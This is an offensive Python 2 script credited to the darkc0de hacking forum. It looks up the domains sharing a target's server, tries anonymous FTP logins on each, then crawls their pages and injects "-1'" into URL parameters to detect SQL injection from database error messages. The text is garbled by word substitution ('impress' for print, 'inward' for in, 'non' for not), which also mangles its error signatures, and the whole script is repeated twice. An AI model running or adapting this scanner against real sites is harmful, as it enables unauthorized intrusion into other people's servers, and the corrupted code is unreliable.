import commands, sys, getopt, StringIO, re, ftplib,urllib,HTMLParser,socket,string,StringIO,sets
from ftplib import *
from HTMLParser import HTMLParser
from urllib2 import urlopen
#!/usr/bin/python
################################################################
# .___ __ _______ .___ #
# __| _/____ _______| | __ ____ \ _ \ __| _/____ #
# / __ |\__ \\_ __ \ |/ // ___\/ /_\ \ / __ |/ __ \ #
# / /_/ | / __ \| | \/ <\ \___\ \_/ \/ /_/ \ ___/ #
# \____ |(______/__| |__|_ \\_____>\_____ /\_____|\____\ #
# \/ \/ \/ #
# ___________ ______ _ __ #
# _/ ___\_ __ \_/ __ \ \/ \/ / #
# \ \___| | \/\ ___/\ / #
# \___ >__| \___ >\/\_/ #
# est.2007 \/ \/ forum.darkc0de.com #
################################################################
# Greetz to all Darkc0de AH,ICW Memebers
#Darkc0de-d3hydra,beenu,hubysoft,Gatyi,
#Shoutz to ICW-:r45c4l,SMART_HAX0R,j4ckh4x0r,41w@r10r,micro,cyber_mafi,Hoodlum
#Gud Luck to:d4Rk 4n931
class checkp(HTMLParser):
def __init__(self, ldomain, scandpth, lps):
HTMLParser.__init__(self)
self.url = ldomain
self.db = {self.url: 1}
self.node = [self.url]
self.depth = scandpth
self.max_span = lps
self.links_found = 0
def handle_starttag(self, tag, attrs):
if self.links_found < self.max_span as well as tag == 'a' as well as attrs:
link = attrs[0][1]
if link[:4] != "http":
link = '/'.join(self.url.split('/')[:3])+('/'+link).replace('//','/')
if link non inward self.db:
impress "Found Link ---> %s" % link
self.links_found += 1
self.node.append(link)
self.db[link] = (self.db.get(link) or 0) + 1
def deep(self):
for depth inward xrange(self.depth):
impress "*"*70+("\nScanning depth %d web\n" % (depth+1))+"*"*70
context_node = self.node[:]
self.node = []
for self.url inward context_node:
self.links_found = 0
try:
req = urlopen(self.url)
res = req.read()
self.feed(res)
except:
self.reset()
impress "*"*40 + "\nRESULTS\n" + "*"*40
sor = [(v,k) for (k,v) inward self.db.items()]
sor.sort(reverse = True)
furnish sor
def sqlcheck(link):
try:
impress "sqling checking"
error="Warning"
mysql ="mysql_fetch_array()"
mysql2 ="mysql_fetch_array()"
mysql3 ="You convey an mistake inward your SQL syntax"
mssql= "Unclosed quotation grade later the grapheme string"
mssql2="Server Error inward '/' Application"
mssql3="Microsoft OLE DB Provider for ODBC Drivers error"
oracle="supplied declaration is non a valid OCI8-Statement"
jetdb ="microsoft jet database engine"
domain =link
sqli=[]
try:
if domain.count("=") >= 2:
for x inward xrange(domain.count("=")):
sqli.append(domain.rsplit("=",x+1)[0]+"=")
if domain.find("=") != -1:
sqli.append(domain.split("=",1)[0]+"=")
else:
sqli.append(domain.split("=",1)[0]+"=")
except() ,msg: impress error
sqli = list(sets.Set(sqli))
impress "[+] Checking :",len(sqli),"links\n"
for slinks inward sqli:
impress '+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++'
resp =urllib.urlopen(slinks+"-1'").read(200000)
print slinks+"-1'"
if re.search(error, resp) != None:
impress " FOUND UNKNOWN BUG IN THIS GET REQUEST "
if re.search(mysql, resp) != None:
impress " FOUND MYSQL BUG IN THIS GET REQUEST "
if re.search(mysql2, resp) != None:
impress " FOUND MYSQL BUG IN THIS GET REQUEST "
if re.search(mssql, resp) != None:
impress " FOUND MSSQL BUG IN THIS GET REQUEST "
if re.search(mssql2, resp) != None:
impress " FOUND MSSQL BUG IN THIS GET REQUEST "
if re.search(mssql3, resp) != None:
impress " FOUND MSSQL BUG IN THIS GET REQUEST "
if re.search(oracle, resp) != None:
impress " FOUND ORACLE BUG IN THIS GET REQUEST "
if re.search(jetdb, resp) != None:
impress " FOUND JET DATA BASE BUG IN THIS GET REQUEST "
if re.search(mysql3, resp) != None:
impress "FOUND MYSQL BUG IN THIS GET REQUEST "
impress '+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++'
except(IOError) ,msg: impress 'erro'
def ftpcheck(ftpdn):
try:
ftp=FTP(ftpdn)
ftp.login()
ftp.retrlines('list')
impress "\nAnonymous loging possible: Try running a brand directory command"
except(ftplib.all_errors),msg: impress "Anonymous non Possible||Or Unknown Error"
print "[+]Web Server Application SQL Vulnerability Scanner Version 1.0 past times FB1H2S"
print "[+]Scans every sub domains of the given spider web site for SQL/FTP bugs"
print "[+]Report Bugs at fbone@in.com"
domain=raw_input("[+]Enter doamin adress:")
reverse=socket.gethostbyaddr(domain)
ip=str(reverse[2])
ip = ip[2:-2]
print '[+]Server ip[-]'+ip
url ='http://www.ipnear.com/results.php?s='+ip+'&submit=Lookup'
result = urllib.urlopen(url).read(200000)
linksList = re.findall('href=(.*?)>.*?',result)
print '[+]Checking anonymous FTP acess[+]'
ftpcheck(ip)
print '[+]Retrive Domains[+]'
raw_input('[+]Press Enter to Continue')
for link inward linksList:
strip = link[1:-1]
domain = strip[7:-1]
impress domain
yes=raw_input('Do u wishing to banking venture tally sudoamins for anonymous ftp: Y|continue: northward |Skip:')
if yes=='y' or yes=='Y':
for link inward linksList:
strip = link[1:-1]
domain = strip[7:-1]
impress '\nFtp::'+domain+':'
ftpcheck(domain)
elif yes=='N'or yes=='n':
impress 'Ftp banking venture tally abroted[+]'
impress 'Crwling spider web pages for SQLing[+]'
for link inward linksList:
strip = link[1:-1]
domain = strip[7:-1]
impress "Geting links of :->"+domain
try:
httpdmn='http://'+domain
# alter the scandpth value to growth the crawling depths
check1 = checkp(ldomain = httpdmn, scandpth = 3, lps = 15)
upshot = check1.deep()
for (n,link) inward result:
if link.find("=") != -1:
if link.find(httpdmn)!=-1:
impress "%s was institute %d time%s." %(link,n, "s" if n is non 1 else "")
sqlcheck(link)
except(IOError) ,msg: impress 'skiped'
from ftplib import *
from HTMLParser import HTMLParser
from urllib2 import urlopen
#!/usr/bin/python
################################################################
# .___ __ _______ .___ #
# __| _/____ _______| | __ ____ \ _ \ __| _/____ #
# / __ |\__ \\_ __ \ |/ // ___\/ /_\ \ / __ |/ __ \ #
# / /_/ | / __ \| | \/ <\ \___\ \_/ \/ /_/ \ ___/ #
# \____ |(______/__| |__|_ \\_____>\_____ /\_____|\____\ #
# \/ \/ \/ #
# ___________ ______ _ __ #
# _/ ___\_ __ \_/ __ \ \/ \/ / #
# \ \___| | \/\ ___/\ / #
# \___ >__| \___ >\/\_/ #
# est.2007 \/ \/ forum.darkc0de.com #
################################################################
# Greetz to all Darkc0de AH,ICW Memebers
#Darkc0de-d3hydra,beenu,hubysoft,Gatyi,
#Shoutz to ICW-:r45c4l,SMART_HAX0R,j4ckh4x0r,41w@r10r,micro,cyber_mafi,Hoodlum
#Gud Luck to:d4Rk 4n931
class checkp(HTMLParser):
def __init__(self, ldomain, scandpth, lps):
HTMLParser.__init__(self)
self.url = ldomain
self.db = {self.url: 1}
self.node = [self.url]
self.depth = scandpth
self.max_span = lps
self.links_found = 0
def handle_starttag(self, tag, attrs):
if self.links_found < self.max_span as well as tag == 'a' as well as attrs:
link = attrs[0][1]
if link[:4] != "http":
link = '/'.join(self.url.split('/')[:3])+('/'+link).replace('//','/')
if link non inward self.db:
impress "Found Link ---> %s" % link
self.links_found += 1
self.node.append(link)
self.db[link] = (self.db.get(link) or 0) + 1
def deep(self):
for depth inward xrange(self.depth):
impress "*"*70+("\nScanning depth %d web\n" % (depth+1))+"*"*70
context_node = self.node[:]
self.node = []
for self.url inward context_node:
self.links_found = 0
try:
req = urlopen(self.url)
res = req.read()
self.feed(res)
except:
self.reset()
impress "*"*40 + "\nRESULTS\n" + "*"*40
sor = [(v,k) for (k,v) inward self.db.items()]
sor.sort(reverse = True)
furnish sor
def sqlcheck(link):
try:
impress "sqling checking"
error="Warning"
mysql ="mysql_fetch_array()"
mysql2 ="mysql_fetch_array()"
mysql3 ="You convey an mistake inward your SQL syntax"
mssql= "Unclosed quotation grade later the grapheme string"
mssql2="Server Error inward '/' Application"
mssql3="Microsoft OLE DB Provider for ODBC Drivers error"
oracle="supplied declaration is non a valid OCI8-Statement"
jetdb ="microsoft jet database engine"
domain =link
sqli=[]
try:
if domain.count("=") >= 2:
for x inward xrange(domain.count("=")):
sqli.append(domain.rsplit("=",x+1)[0]+"=")
if domain.find("=") != -1:
sqli.append(domain.split("=",1)[0]+"=")
else:
sqli.append(domain.split("=",1)[0]+"=")
except() ,msg: impress error
sqli = list(sets.Set(sqli))
impress "[+] Checking :",len(sqli),"links\n"
for slinks inward sqli:
impress '+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++'
resp =urllib.urlopen(slinks+"-1'").read(200000)
print slinks+"-1'"
if re.search(error, resp) != None:
impress " FOUND UNKNOWN BUG IN THIS GET REQUEST "
if re.search(mysql, resp) != None:
impress " FOUND MYSQL BUG IN THIS GET REQUEST "
if re.search(mysql2, resp) != None:
impress " FOUND MYSQL BUG IN THIS GET REQUEST "
if re.search(mssql, resp) != None:
impress " FOUND MSSQL BUG IN THIS GET REQUEST "
if re.search(mssql2, resp) != None:
impress " FOUND MSSQL BUG IN THIS GET REQUEST "
if re.search(mssql3, resp) != None:
impress " FOUND MSSQL BUG IN THIS GET REQUEST "
if re.search(oracle, resp) != None:
impress " FOUND ORACLE BUG IN THIS GET REQUEST "
if re.search(jetdb, resp) != None:
impress " FOUND JET DATA BASE BUG IN THIS GET REQUEST "
if re.search(mysql3, resp) != None:
impress "FOUND MYSQL BUG IN THIS GET REQUEST "
impress '+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++'
except(IOError) ,msg: impress 'erro'
def ftpcheck(ftpdn):
try:
ftp=FTP(ftpdn)
ftp.login()
ftp.retrlines('list')
impress "\nAnonymous loging possible: Try running a brand directory command"
except(ftplib.all_errors),msg: impress "Anonymous non Possible||Or Unknown Error"
print "[+]Web Server Application SQL Vulnerability Scanner Version 1.0 past times FB1H2S"
print "[+]Scans every sub domains of the given spider web site for SQL/FTP bugs"
print "[+]Report Bugs at fbone@in.com"
domain=raw_input("[+]Enter doamin adress:")
reverse=socket.gethostbyaddr(domain)
ip=str(reverse[2])
ip = ip[2:-2]
print '[+]Server ip[-]'+ip
url ='http://www.ipnear.com/results.php?s='+ip+'&submit=Lookup'
result = urllib.urlopen(url).read(200000)
linksList = re.findall('href=(.*?)>.*?',result)
print '[+]Checking anonymous FTP acess[+]'
ftpcheck(ip)
print '[+]Retrive Domains[+]'
raw_input('[+]Press Enter to Continue')
for link inward linksList:
strip = link[1:-1]
domain = strip[7:-1]
impress domain
yes=raw_input('Do u wishing to banking venture tally sudoamins for anonymous ftp: Y|continue: northward |Skip:')
if yes=='y' or yes=='Y':
for link inward linksList:
strip = link[1:-1]
domain = strip[7:-1]
impress '\nFtp::'+domain+':'
ftpcheck(domain)
elif yes=='N'or yes=='n':
impress 'Ftp banking venture tally abroted[+]'
impress 'Crwling spider web pages for SQLing[+]'
for link inward linksList:
strip = link[1:-1]
domain = strip[7:-1]
impress "Geting links of :->"+domain
try:
httpdmn='http://'+domain
# alter the scandpth value to growth the crawling depths
check1 = checkp(ldomain = httpdmn, scandpth = 3, lps = 15)
upshot = check1.deep()
for (n,link) inward result:
if link.find("=") != -1:
if link.find(httpdmn)!=-1:
impress "%s was institute %d time%s." %(link,n, "s" if n is non 1 else "")
sqlcheck(link)
except(IOError) ,msg: impress 'skiped'